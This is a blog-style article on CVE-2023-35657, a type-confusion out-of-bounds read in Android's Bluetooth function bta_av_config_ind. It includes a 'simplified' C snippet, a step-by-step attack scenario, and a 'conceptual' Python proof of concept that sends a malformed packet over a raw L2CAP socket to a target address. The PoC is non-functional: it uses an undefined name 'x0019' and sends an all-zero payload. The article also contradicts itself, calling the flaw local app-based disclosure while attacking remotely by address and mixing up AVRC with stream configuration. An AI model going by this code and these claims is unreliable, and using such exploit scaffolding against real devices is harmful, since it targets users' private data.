CVE-2023-35657 - Exploiting Type Confusion in `bta_av_config_ind` for Out-of-Bounds Reading

A serious security vulnerability was identified in the Android Bluetooth stack, specifically within the function bta_av_config_ind in the file bta_av_aact.cc. The bug, tracked as CVE-2023-35657, arises from type confusion, which can enable an attacker to read out-of-bounds memory. The threat? Local information disclosure — an attacker with local access could harvest sensitive information from the device, all without needing user interaction or elevated permissions.

This article breaks down the vulnerability, shows a code snippet for understanding, links to resources, and outlines how an attacker can exploit this flaw.

What Is CVE-2023-35657?

CVE-2023-35657 is a security flaw present in certain Android devices, related to how they process Bluetooth AVRC (Audio/Video Remote Control) messages. The problem is in how data structures are interpreted: the function might treat input data as one type when it’s really another, leading to the function reading outside the expected data range (out-of-bounds). This is called type confusion.

Let’s break it down

bta_av_config_ind is called when the device receives configuration information for Bluetooth AV connections. It’s supposed to read the provided data safely, but due to a programming flaw, it interprets the incoming data as a different type than what it actually is. This can cause the function to read more memory than intended — possibly pulling in sensitive data.

Here’s a simplified example to illustrate

// Simplified illustration. Real code is more complex.
void bta_av_config_ind(tBTA_AV_SCB* p_scb, tAVDT_CONFIG_IND* p_data) {
    // ... setup and checks ...
    tAVDT_CFG* p_cfg = (tAVDT_CFG*) p_data->p_cfg; // Type confusion here
    // Instead of ensuring p_data->p_cfg is always the expected type,
    // the code just casts it, risking type confusion.
    
    // OOB read possibility:
    memcpy(dest, p_cfg->codec_info, p_cfg->num_codec_info); // num_codec_info may be invalid
}

If p_cfg->num_codec_info is not what the code expects, due to the wrong interpretation of the data, memcpy could read way past the buffer into neighboring memory. This might grab unrelated, sensitive data.

The malicious app sends a Bluetooth configuration packet crafted to cause the type confusion.

- The Bluetooth stack processes it, and because of the type confusion, the stack leaks out-of-bounds memory to the attacker-controlled process.

For example, a Bluetooth packet with deliberately malformed configuration data could cause the Bluetooth daemon to read more data than it should, sending secret device memory (possibly containing other app data) back to the attacker’s process.

Why is this bad?

- Permanent device compromise is not possible, but secret data could be leaked (e.g., WiFi passwords, memory addresses for other processes, user data, etc).

Proof of Concept (PoC)

Here’s a *conceptual* Python PoC for where this logic would go, assuming you have a way to send raw packets to the Bluetooth stack:

import socket

def exploit_cve_2023_35657(bt_addr):
    # Craft a malformed config packet with an oversized codec_info field
    malformed_packet = b"\x00" * 100  # Overly large to trigger OOB read
    s = socket.socket(socket.AF_BLUETOOTH, socket.SOCK_RAW, socket.BTPROTO_L2CAP)
    s.connect((bt_addr, x0019))  # AVCTP channel
    s.send(malformed_packet)
    # If device is vulnerable, the stack leaks memory content in response

if __name__ == "__main__":
    target_bt_addr = "00:11:22:33:44:55"
    exploit_cve_2023_35657(target_bt_addr)

Note: This is illustrative. Actual exploit creation would require precise knowledge of the internal packet formats and may need native code.

Avoid installing suspicious apps, especially those requesting Bluetooth permissions.

To check if your device is patched: go to Settings > About phone > Android version and make sure your security patch is Dec 2023 or later.

Original References

- Android Security Bulletin, December 2023
- AOSP commit fixing CVE-2023-35657
- CVE record at MITRE

Conclusion

CVE-2023-35657 is an example of how type confusion bugs can have a serious impact, even without user interaction or elevated privileges. By just sending a bad Bluetooth packet, sensitive data could be leaked! If you’re an Android user or developer, stay up to date with security patches, and always be wary of apps asking for Bluetooth permissions without a clear reason.

Timeline

Published on: 09/04/2025 18:15:37 UTC
Last modified on: 09/05/2025 18:59:09 UTC